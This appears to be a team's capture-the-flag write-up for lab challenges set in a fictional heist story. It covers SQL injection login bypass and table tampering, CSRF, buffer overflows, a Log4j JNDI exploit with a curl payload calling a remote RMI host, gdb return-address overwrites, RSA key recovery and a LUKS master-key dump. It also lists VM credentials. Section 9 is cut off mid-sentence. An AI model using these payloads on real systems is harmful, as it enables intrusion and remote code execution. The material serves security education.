# Group 4 CTF [toc] VM Login info: terminator- Username: terminator | Password: 123456 | root Password: 123456 precious- Username: user | Password: user | root Password: user handsomeroy- Username: evil | Password: evillives4ever | root Password: beginrobbery leaderboard- Username: admin | Password: password > Please give a short description that roughly match the story line. ## Story Line **Morgenstern's Finest Ice Cream** The Morgensterns are a wealthy family living in an exquisite mansion in Monaco. One day, their peaceful lives are disturbed by a robbery. Jewelry, gold and other family treasures were stolen, but Lord Morgenstern refused to seek help from the authorities due to unidentified reasons. Private investigators were hired to uncover the identities of the criminal syndicate, who demanded a big ransom. Now, your team is hired by Lord Morgenstern to hack the criminal syndicate, defeat them and help Lord Morgenstern reclaim his treasures. Funny enough, every evil organization has fractures within. The criminal people are also wary of each other, for their own reasons, and cracking down on them one by one is just as good a strategy as attacking them as a whole. A fortune awaits as a reward, and Lord Morgenstern upholds his promises. Each time your team captures a flag, you get a part of the treasure as a reward. Behold the quest for fame and honor!  (Image found on the Internet, from unrelated sources; storyline is entirely fictional) (Morgenstern’s ice cream in New York City is really good, for unidentified reasons)  (Karl Lagerfeld’s mysterious Monaco mansion, Lord Morgenstern’s personal property in our alternative universe) ***Good luck!*** ## 1. SQLi #### Est. Time: 15 mins Yao Xiao Sarah `flag{treasure_chest_01}` Flag is found on the success page. ### Login Page To bypass login, the username and password are not provided.  ### Fail Page If the wrong username and/or password combination is entered, including empty username or password, while failing to bypass the login via SQL injection:  From the login fail page, they can go back to try again. ### Solution By entering in the password field a SQL injection command such as the following: ``` p' OR '1' = '1 ``` Contestants will be able to access the following login success page without knowledge of the correct credentials.  This page can potentially include hints for the next flags as fruits. The “Last access times” table can include strings of characters and numbers as clues. Also, the contestants get rewarded with the fruit of correct username and password combinations for bypassing login on the success page. These can also be potentially used in the next flags. ### Additional Task There is a list of username and password combinations, and hence, SQL injection can be used to change this information. The below are some examples: If this command was entered in the password field: ``` mysecret'; INSERT INTO `users` (`user_id`, `username`, `password`) VALUES (NULL, 'clerk03', 'myphp'); ``` It can be seen in the users table that a new user is created.  If this command was entered in the password field: ``` mysecret'; UPDATE `users` SET `username` = 'clerk10', `password`= 'gotyou' WHERE `user_id` = 2; ``` It can be seen in the users table that the username and password of one of the users is changed.  ## 2. CSRF #### Estimated Time: 20 mins Zhenhe Zhang ### Introduction In this CTF challenge, we will be exploiting a CSRF vulnerability in a web application to modify a user's information without their consent. Our objective is to perform a successful CSRF attack and retrieve the FLAG. ### Initial Analysis The web application can be accessed at http://localhost:8080/#/. The login page is displayed, prompting for a username and password. We can login using the username 'admin' and the correct password.  After logging in, we are redirected to the main page, where we can view the user's information. We notice that there is an address, phone number, and a name field. The user's name is 'Anna', the phone number is '000', and the address is 'jhu'.   We then navigate to the New Games page at http://localhost:8080/#/newPage, where we see a form with a 'Try me' button. Clicking on the button sends a GET request to http://localhost:3000/user/Anna/update?phone=456.  ### Crafting the Exploit To perform the CSRF attack, we need to craft a malicious HTML page that will submit a form to modify the user's information without their consent. The page will contain a hidden input field with the name 'phone' and the value '456', which will be submitted to the vulnerable web application when the user clicks on the 'Try me' button   This code will automatically submit the form when the page is loaded, without the user's knowledge. It will send a POST request to the vulnerable URL, with the phone number set to '456'.  ### Exploiting the Vulnerability To exploit the vulnerability, we host the malicious HTML page on a web server and trick the victim into visiting the page. When the victim visits the page, the form will automatically be submitted and the phone number will be changed to '456' without the victim's consent. After performing the CSRF attack, we can verify that the phone number has been changed by visiting the main page again. The phone number displayed should now be '456'. ### Setup and Configuration Backend command: npm run serve Frontend command: node index.js Flag{I_Love_The_World} Username: admin Password: password ### Conclusion In this challenge, we have successfully exploited a CSRF vulnerability in a web application to modify a user's information without their consent. By crafting a malicious HTML page and tricking the victim into visiting it, we were able to change the user's phone number. By performing this attack, we have retrieved the FLAG.  ## 3. Buffer Overflow - Lost Masterpiece #### Est. Time: 10 mins Xinyu Fang ### Introduction In this CTF challenge, our objective is to find and exploit a vulnerability in the "Lost Masterpiece" binary, which is provided inside a Docker container. The challenge provides a Docker image, and our task is to run the container, analyze the vulnerability, and retrieve the FLAG. ### Solution #### Step 1: Initial Analysis Once inside the VM, we can see the `lost_masterpiece` binary. Let's examine the binary using the `file` command: ```bash $ file lost_masterpiece ``` The output indicates that this is a 64-bit ELF binary, which is not stripped. This means we can use tools like `objdump` or `gdb` to analyze the binary. #### Step 2: Analyzing the Binary Let's disassemble the binary using `objdump`: ```bash $ objdump -d -M intel lost_masterpiece ``` We can observe that there is a `main` function, and inside the main function, there's a call to `gets` function, which is known to be vulnerable to buffer overflow attacks. The code reads data into a 128-byte buffer, and there's a flag variable just before the buffer. Our objective is to overflow the buffer and overwrite the flag variable. #### Step 3: Crafting the Exploit To create the payload, we need to determine the offset between the buffer and the flag variable. In this case, the buffer is 128 bytes, but actually by analysis, the actual distance between buffer and the flag is 140 bytes. The flag variable is an integer, typically 4 bytes (depending on the platform and compiler). We need to fill at least 140 bytes and then add a non-zero integer to overwrite the flag variable. We can use Python to generate the payload: ```python payload = "A" * 140 + "BBBB" print(payload) ``` Save this script as `generate_payload.py`. Then, run the script and save the output to a file named `payload.txt`: ```bash $ python generate_payload.py > payload.txt ``` #### Step 4: Exploiting the Vulnerability Now that we have the payload, we can use it to exploit the vulnerability. Feed the payload to the `lost_masterpiece` binary: ```bash $ ./lost_masterpiece < payload.txt ``` As a result, the buffer overflows and overwrites the flag variable with a non-zero value. The program then outputs the FLAG: ```bash Congratulations, you found The Battle of Anghiari! FLAG[Leonardo_di_ser_Piero_da_Vinci] ``` ## 4. Zig-Zag Beep #### Est. Time: 20 mins Anais Huang *Stego* **Description:** The theft sent you a strange file, wait, it gives out the strange beep sounds. What's that? Use Audacity to open the wav file and get morse code. ``` ----- .---- .---- ----- ----- .---- .---- ----- / ----- .---- .---- .---- ----- ----- .---- .---- / ----- .---- .---- ----- .---- .---- ----- ----- / ----- ----- .---- .---- ----- ----- ----- .---- / ----- .---- .---- ----- .---- ----- ----- .---- / ----- .---- .---- .---- .---- .---- ----- .---- / ----- .---- .---- ----- ----- ----- ----- .---- / ----- .---- .---- ----- .---- ----- ----- ----- / ----- ----- .---- .---- ----- ----- .---- ----- / ----- .---- .---- .---- ----- ----- ----- ----- / ----- .---- .---- ----- ----- .---- .---- .---- / ----- .---- ----- .---- ----- .---- ----- ----- / ----- .---- .---- ----- ----- ----- .---- ----- / ----- ----- .---- .---- ----- ----- .---- .---- / ----- .---- .---- .---- .---- ----- .---- .---- / ----- ----- .---- .---- ----- ----- .---- .---- ``` Convert the morse code to text. ``` 01100110 01110011 01101100 00110001 01101001 01111101 01100001 01101000 00110010 01110000 01100111 01010100 01100010 00110011 01111011 00110011 ``` Then convert the binary to ascii. `fsl1i}ah2pgTb3{3` According to task name, it should be Rail fence(zig zag) encryption. Try to brute force and you can get the flag. `flag{Th1si2b33p}` ## 5. Exploit Log4j Vulnerability #### Est. Time: 30 mins Kyle Wang `flag{th11siogforjf1ag}` **Description:** Log4j is a popular Java-based logging utility that is widely used by many applications and systems to generate logs. Log4j has a critical vulnerability exists in the Log4j 2.x versions before version 2.15.0, referred to as **CVE-2021-44228**, that can allow an attacker to execute arbitrary code on a targeted system. I will introduce how to exploit this vulnerability in the following steps. ### Create JNDI service #### Step 1 : Installation We can select one of the two methods to get the jar. 1、Download the latest jar from [Realease](https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar). 2、Clone the source code to local and build (Requires Java 1.8+ and Maven 3.x+). ``` $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git $ cd JNDI-Injection-Exploit $ mvn clean package -DskipTests ``` #### Step 2 : Usege Run as ``` $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] ``` Example： ``` $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/example.txt" -A "10.0.0.151" ``` where: - -C - command executed in the remote classfile. (optional , default command is "open /Applications/Calculator.app") - -A - the address of your server, maybe an IP address or a domain. (optional , default address is the first network interface address) Points for attention: - make sure your server's ports (1099, 1389, 8180) are available . or you can change the default port in the run.ServerStart class line 26~28. - your command is passed to Runtime.getRuntime().exec() as parameters, so you need to ensure your command is workable in method exec(). Command in bash like "bash -c ...." need to add Double quotes. ``` curl --location --request GET 'http://127.0.0.1:8080/api/search' \ --header 'Content-Type: application/json' \ --data '"${jndi:rmi://10.203.35.50:1099/qawun3}"' ``` ## 6. PWN - Secret Vault #### Est. Time: 40 mins Xinyu Fang ### Challenge Description In this challenge, we are provided with a 64-bit executable file called `secret_vault.exe`. The source code of the program is not provided. The objective is to extract the flag from the executable. ### Solution #### Step 1: Initial Investigation After investigation, we will find out the original file can not be analyzed using GDB. To check whether the `secret_vault.exe` file is packed, you can use PEiD. You will see that the executable is compressed by UPX. #### Step 2: Decompressing the executable First, we need to decompress the executable using UPX. To do this, we can run the following command: ```bash $ upx -d secret_vault.exe ``` Now, we can analyze the decompressed executable using a disassembler or a debugger like GDB, IDA, or Ghidra. For this write-up, we will use GDB. #### Step 3: Exploring the functions To find out what functions are present in the executable, we can use GDB's `info functions` command: ```bash $ gdb secret_vault.exe (gdb) info functions ``` This will list all the functions in the executable. Look for a function that might contain the flag or be related to the challenge, such as the `secret_vault()` function. #### Step 4: Analyzing the code Once we've identified the function(s) of interest, we can disassemble and analyze them using GDB. In this case, we'll focus on the `secret_vault()` function. ``` (gdb) disassemble secret_vault Dump of assembler code for function _Z12secret_vaultv: 0x0000000140001450 <+0>: push %rbp 0x0000000140001451 <+1>: mov %rsp,%rbp 0x0000000140001454 <+4>: sub $0x30,%rsp 0x0000000140001458 <+8>: movl $0x0,-0x4(%rbp) 0x000000014000145f <+15>: cmpl $0x20000522,-0x4(%rbp) 0x0000000140001466 <+22>: jne 0x140001479 <_Z12secret_vaultv+41> 0x0000000140001468 <+24>: lea 0x7b91(%rip),%rax # 0x140009000 0x000000014000146f <+31>: mov %rax,%rcx 0x0000000140001472 <+34>: call 0x140007bd0 <_Z6printfPKcz> 0x0000000140001477 <+39>: jmp 0x140001488 <_Z12secret_vaultv+56> 0x0000000140001479 <+41>: lea 0x7b98(%rip),%rax # 0x140009018 0x0000000140001480 <+48>: mov %rax,%rcx 0x0000000140001483 <+51>: call 0x140007bd0 <_Z6printfPKcz> 0x0000000140001488 <+56>: nop 0x0000000140001489 <+57>: add $0x30,%rsp 0x000000014000148d <+61>: pop %rbp 0x000000014000148e <+62>: ret End of assembler dump. ``` By analyzing the disassembled code, we can identify the flag printing logic and the conditions that need to be met. Here, we need to enter the `secret_vault()`function then set the `keyhole` variable to be `0x20000522` before extracting the flag. First, set a breakpoint at the `main()` function call and run the program: ```bash (gdb) break *main Breakpoint 1 at 0x14000149c (gdb) run ``` #### Step 5: Inspecting the stack To make sure the program jump to `secret_vault` function after finish `main()`, we can inspect the stack using the `info frame` command. This may output the stack in the format below: ```bash (gdb) info frame Stack level 0, frame at 0x5ffeb0: rip = 0x14000149c in main; saved rip = 0x1400012ef Arglist at 0x5ffea0, args: Locals at 0x5ffea0, Previous frame's sp is 0x5ffeb0 Saved registers: rbp at 0x5ffea0, rip at 0x5ffea8 ``` Clearly, the previous address in`$rip` which is`0x1400012ef` is stored at `0x5ffea8`. It means the program will continue to whatever at `0x1400012ef` after finishing `main()`. Thus, we overwrite it with the address of `secret_vault()` function. ```bash (gdb) set *(void**)0x5ffea8=0x0000000140001450 ``` Then, we set a breakpoint before the comparison between control variable and `0x20000522`. ```bash (gdb) b *0x000000014000145f Breakpoint 2 at 0x14000145f (gdb) c Continuing. ``` Randomly input a string to skip the `gets()` function. The program will stop in `secret_vault() ` function before comparison. Use instruction below to obtain the address of control variable `keyhole`: ```bash (gdb) x/1xw $rbp-0x4 0x5ffea4: 0x00000000 ``` Overwrite the original value with `0x20000522`. ```bash (gdb) set *(int*)0x5ffea4=0x20000522 ``` Enter `continue` and the program will out put the FLAG. Congrats! ```bash (gdb) c Continuing. SECRET_FLAG[ruby_necklace] ``` ### Trap Solution The conventional solution of constructing a payload and passing it to the `gets()` function won't work in this question. The reason is that even if you pass the correct value to `keyhole` through `gets()`, the `secret_vault()` function contains a variable initialization that will overwrite the value you set previously. Furthermore, I set `0x20000522` as one of the values needed to be passed. It contains multiple consecutive `0`s, which correspond to the `NUL` character in ASCII. I doubt whether we can successfully pass `NUL` to `gets()` or not, because I have tried tens of times but none of these methods succeeded. Nonetheless, I'll give the payload I constructed as a reference for anyone who's interested. To be noted, the system adopted big-endian. ```bash python -c "print('A'*36 + '\x20\x00\x05\x22' + '\x00\x00\x00\x01\x40\x00\x14\x50') " > payload.txt ``` ## 7. RSA Attack - Given p+2q to decrypt #### Est. Time: 20 mins Zeyin Zhang Flag: 76216626 <h4> First step: </h4> ```python # use z3 Solver, and we already know x = p+2q, n = p*q, c = Enc(m), e is public x = n = c = e = s = Solver() s.add(x == p + 2*q, n == p*q) s.check() m = s.model() ``` <h4> Second Step: </h4> After you solve out p and q, it's trivial knowledge to decrypt RSA-encrypted message. ```python phi_n = p*q d = pow(e, -1, m) flag = hex(pow(c, d, n)) ``` Following is a sample program: ```python from z3 import * from binascii import hexlify, unhexlify import math import gmpy2 import codecs x = n = c = e = p = Int('p') q = Int('q') s = Solver() s.add(x == p + 2*q, n == p*q) s.check() m = s.model() p = int(m[p].as_long()) q = int(m[q].as_long()) m = (p - 1)*(q - 1) d = pow(65537, -1, m) flag = hex(pow(c, d, n)) flag = flag[2:] print(codecs.decode(flag, "hex")) ``` ## 8. RSA Attack - Dp Leak Attack #### Est. Time: 28 mins Zeyin Zhang Flag: Roy_Kwok_is_the_most_handsome_boy_in_the_whole_world <h4> First step: </h4> Mathematic Proof: ``` dp = d % (p-1) d = dp + k * (p-1) and we always have ed = 1 + x *(p-1) * (q-1), that's how we get d so based on above two equation: e * dp + e * k * (p-1) = 1 + x * (p-1) * (q-1) e * dp = 1 + (x * (q-1) - e * k) * (p-1) e * dp ≡ 1 mod (p-1) then we can get e * dp = 1 + z * (p - 1) z = (e * dp - 1) / (p - 1) Since dp < (p-1) we can get z < e As a result, p - 1 = (e * dp - 1) / z. When e is not that large, we can enumerate z and as long as it can be divided, then we can potentially get p - 1. ``` <h4> Second step: </h4> Write code, a sample program is attached below: ```python e = n = c = dp = for x in range(1, e): if(e * dp % x == 1): p = (e*dp-1)//x+1 if(n%p!=0): continue q = n//p phi_n = (p-1)*(q-1) d = gp.invert(e, phi_n) m = gp.powmod(c, d, n) if (len(hex(m)[2:])%2==1): continue print(bytes.fromhex(hex(m)[2:])) ``` ---  to get into the server. Then get the flag's file.  2. Use browser to login to the server website. To get password for ssh .  3. Use ssh to login to the server, to get the flag username: evil password: evillives4ever  ## 10. Luks Master Key Dump #### Est. time: 30 mins Xianglong Wang Flag: Flag.txt. The content is: Well_you_finally_made_it Solution: The basic concept here is how Luks encrypt files. Luks uses the user-passed-in password to encrypt a master password. Then, Luks encrypts the image based on the master password. It is doing so because Luks do not need to re-encrypt the whole image, each time the user modifies the password. The basic idea is that the user could utilize the old password to dump the master key from the old image file. Then, the user could use the master password to decrypt the newer image file and get the flag. Solution Commands: ○ # loop old image ○ sudo losetup -P /dev/[loop#] /path/to/log-3-20-2023.img ○ ○ # dump masterkey with old password ○ sudo cryptsetup luksDump --dump-master-key /dev/loop42 ○ ○ # dump key to binary ○ echo'b24aca...'|tr-d''|xxd-r-p>mk.bin ○ ○ # loop new image ○ sudo losetup -P /dev/loop43 /path/to/log-3-21-2023.img ○ ○ # decrypt new image ○ sudo cryptsetup luksOpen --master-key-file mk.bin /dev/loop43 luks-new ○ ○ # mount partition ○ sudo mkdir /mnt/new-img && sudo mount /dev/mapper/luks-new /mnt/new-img ○ ○ # get flag